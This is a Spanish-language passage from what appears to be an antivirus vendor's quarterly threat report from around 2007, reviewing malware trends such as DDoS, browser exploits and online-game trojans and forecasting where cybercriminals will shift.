Los acontecimientos más importantes de este trimestre que reflejamos en el presente informe nos han dado bastante en qué pensar. Pero todavía no nos han dado respuesta a la pregunta ¿cuál es la ruta que seguirán las amenazas virales e informáticas? A pesar de la aparición de nuevos sistemas operativos (Vista), de nuevos servicios (contenidos para móviles) y dispositivos (IPhone), el mundo de los delincuentes cibernéticos muestra poca iniciativa y sigue usando métodos comprobados durante años que causan daño a los usuarios. Las novedades se limitan a meras "pruebas de concepto" aisladas, que no se desarrollan más allá de su propósito original.
Y por si esto fuera poco, se está perfilando un regreso mucho más sustancial a las "fuentes": los ataques DDoS y el aprovechamiento de las vulnerabilidades de los navegadores de Internet están volviendo con nueva fuerza. Quizá lo único que diferencia al presente periodo de su similar de hace tres años sea que la propagación de virus por correo electrónico va quedando cada vez más en segundo plano, cediendo su lugar a los sistemas de mensajes instantáneos y al explosivo crecimiento de los troyanos dirigidos a los usuarios de juegos en línea.
Las amenazas no son cada vez más "inteligentes". El desarrollo se está llevando a cabo por la vía extensiva y todavía no nos queda claro cuál podría ser el catalizador de los cambios globales en el futuro próximo, como lo fue el lanzamiento de Windows 95, la aparición de los gusanos LoveLetter y Mellisa, el primer macrovirus y las epidemias de Lovesan y Mydoom.
Las compañías antivirus han perfeccionado de forma notable sus tecnologías e introducido nuevas, sin dejar de lado el desarrollo de sus productos.
En el presente, cada nueva versión de casi cada paquete antivirus no es sólo una interfaz ligeramente renovada, sino que incluye nuevos elementos que aumentan de manera destacable la protección de los usuarios. Hoy en día, los clientes de las compañías antivirus están mucho más protegidos que hace un par de años. El tiempo medio de vida en "estado natural" de la mayoría de los nuevos programas nocivos se cuenta en horas, muy rara vez en días.
No obstante, intentaremos hacer un pequeño pronóstico del futuro próximo.
Los delincuentes tratarán de salir del "campo de defensa" de las soluciones antivirus: en vez de "evadir el antivirus", su tarea se desplazará a aquellos espacios que todavía no tienen una defensa antivirus de calidad, o dónde esta defensa es imposible debido a toda una serie de factores. Es muy probable que sea precisamente allí donde estará el principal campo de batalla de la guerra informática: en los servicios de los juegos en línea, las bitácoras o weblogs, los sistemas de mensajes instantáneos y las redes de intercambio de ficheros.
